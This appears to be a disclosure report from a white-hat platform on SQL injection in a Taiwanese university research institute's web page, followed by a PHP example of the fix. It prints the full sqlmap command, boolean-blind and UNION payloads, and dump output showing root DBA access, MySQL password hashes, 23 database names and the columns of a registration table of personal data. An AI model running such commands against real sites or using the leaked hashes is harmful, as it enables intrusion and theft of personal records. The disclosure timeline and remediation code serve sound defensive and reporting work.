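2015-10-25: Details reported to the vendor; awaiting vendor handling
2015-10-26: Vendor confirmed; details disclosed to the vendor only
2015-11-05: Details disclosed to core white hats and experts in related fields
2015-11-15: Details disclosed to regular white hats
2015-11-25: Details disclosed to intern white hats
2015-12-10: Details disclosed to the public
A SQL injection vulnerability exists in a page of the medical research institute of National Cheng Kung University, Taiwan (DBA privileges / root password disclosure / 23 databases)
Test URL: http://**.**.**.**/english/index.php?content=teacher_person&id=13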
python sqlmap.py -u "http://**.**.**.**/english/index.php?content=teacher_person&id=13" -p id --technique=BU --random-agent --batch --current-user --is-dba --users --passwords
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: content=teacher_person&id=13' AND 6837=6837 AND 'dwcv'='dwcv

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: content=teacher_person&id=13' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a6271,0x594a505444554a6b544d774d4b74764c6a6573426d76484379616d566f746a6847784f7266485154,0x71717a7671),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.4.33
back-end DBMS: MySQL >= 5.0.0
current user: 'root@localhost'
current user is DBA: True

database management system users [5]:
[*] 'csie_db'@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'%'
[*] 'root'@'localhost'
[*] 'root'@'nckucsie-web'

database management system users password hashes:
[*] csie_db [1]:
    password hash: 11b2fa385b550ba2
[*] debian-sys-maint [1]:
    password hash: 78b482ca427c2f77
[*] root [2]:
    password hash: *DD4F7853FD6ECCC38CA99648DF0363D52194D3B4
    password hash: 11b2fa385b550ba2

available databases [23]:
[*] admission
[*] approbate
[*] class_system
[*] classmate
[*] csie
[*] dept
[*] deptvalid
[*] health
[*] ics2010
[*] imi
[*] information_schema
[*] instvalid
[*] lib
[*] lib_system
[*] master
[*] msic
[*] mysql
[*] ncku_csie
[*] performance_schema
[*] phd
[*] schoolmate
[*] score
[*] test

Database: admission
[2 tables]
+----------+
| proposal |
| register |
+----------+

Database: admission
Table: register
[21 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| time   | datetime    |
| birth  | varchar(16) |
| car1   | tinyint(1)  |
| car2   | tinyint(1)  |
| car3   | tinyint(1)  |
| cell   | varchar(16) |
| email  | varchar(64) |
| food   | varchar(16) |
| food1  | tinyint(1)  |
| food2  | tinyint(1)  |
| food3  | tinyint(1)  |
| id     | varchar(16) |
| name   | varchar(32) |
| office | varchar(64) |
| other1 | tinyint(1)  |
| other2 | tinyint(1)  |
| other3 | tinyint(1)  |
| plate  | varchar(16) |
| school | varchar(64) |
| tel    | varchar(32) |
| title  | varchar(64) |
+--------+-------------+
Filtering.
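The fix the report asks for, as an added example (not code from the affected site): the `id` lookup built by string concatenation, beside a hardened form that accepts only digits and binds the value as a parameter. The `teacher` table, its columns and the function names are hypothetical, and an in-memory SQLite database stands in for the MySQL back end so the script runs offline.

```php
<?php
// Added example. Table, columns and function names are hypothetical;
// in-memory SQLite stands in for the site's MySQL back end.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE teacher (id INTEGER PRIMARY KEY, name TEXT)");
$pdo->exec("INSERT INTO teacher (id, name) VALUES (13, 'Constructed Name')");

// "Before": the request value is pasted into the SQL text, so a quote in
// it ends the string literal and the rest is parsed as SQL.
function lookup_concatenated(PDO $pdo, $id)
{
    $sql = "SELECT name FROM teacher WHERE id = '" . $id . "'";
    return $pdo->query($sql)->fetchColumn();
}

// "After": accept only a short run of decimal digits, then bind the value
// as an integer. The SQL text is fixed; the value is never parsed as SQL.
function lookup_bound(PDO $pdo, $id)
{
    if (!is_string($id) || !ctype_digit($id) || strlen($id) > 9) {
        return false; // caller should answer with an error page
    }
    $stmt = $pdo->prepare("SELECT name FROM teacher WHERE id = :id");
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchColumn();
}

// Inputs: the normal value, and the boolean-based test string that the
// sqlmap output in this report lists for the id parameter.
$inputs = array(
    "13",
    "13' AND 6837=6837 AND 'dwcv'='dwcv",
);
foreach ($inputs as $id) {
    printf(
        "%-40s concatenated=%s bound=%s\n",
        $id,
        var_export(lookup_concatenated($pdo, $id), true),
        var_export(lookup_bound($pdo, $id), true)
    );
}
```

The sqlmap output also shows the application connecting as `root@localhost` with DBA rights; a dedicated account limited to the one schema the page reads would narrow what any remaining injection could reach.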
Severity: High
Vulnerability Rank: 18
Confirmed at: 2015-10-26 23:50
Thank you for the report.
None yet.